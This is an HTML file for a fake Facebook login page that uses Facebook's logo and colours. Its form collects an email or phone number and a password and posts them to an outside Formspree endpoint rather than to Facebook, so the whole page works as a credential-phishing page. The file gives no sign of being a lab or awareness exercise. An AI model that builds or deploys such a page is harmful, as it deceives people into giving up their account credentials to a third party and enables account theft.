<!DOCTYPE html>
<html>
<head>
    <title>Facebook Login</title>
    <link rel="stylesheet" href="style.css">
    <style>
        .login-container {
    text-align: center;
    padding: 20px;
    background-color: #fff;
    border: 1px solid #ddd;
    border-radius: 5px;
    box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
}

img {
    width: 100px;
    margin-bottom: 20px;
}

input {
    width: 100%;
    padding: 10px;
    margin-bottom: 15px;
    border: 1px solid #ccc;
    border-radius: 3px;
}

button {
    background-color: #3b5998;
    color: #fff;
    padding: 10px 20px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}

a {
    color: #3b5998;
    text-decoration: none;
}
    </style>
</head>
<body>
    <div class="login-container">
        <img src="download.png" alt="Facebook Logo">
        <h1>Log In</h1>
        <form action="https://formspree.io/f/xyzyknpr" method="POST">
            <label for="email">Email/phone</label>
            <input type="email" id="email" name="email" required><br><br>
            <label for="name">password:</label>
            <input type="text" id="name" name="name" required><br><br>
            <input type="submit" value="login" style="background-color:blue;">
        </form>

        <p>Don't have an account? <a href="signup.html">Sign Up</a></p>
    </div>
</body>
</html>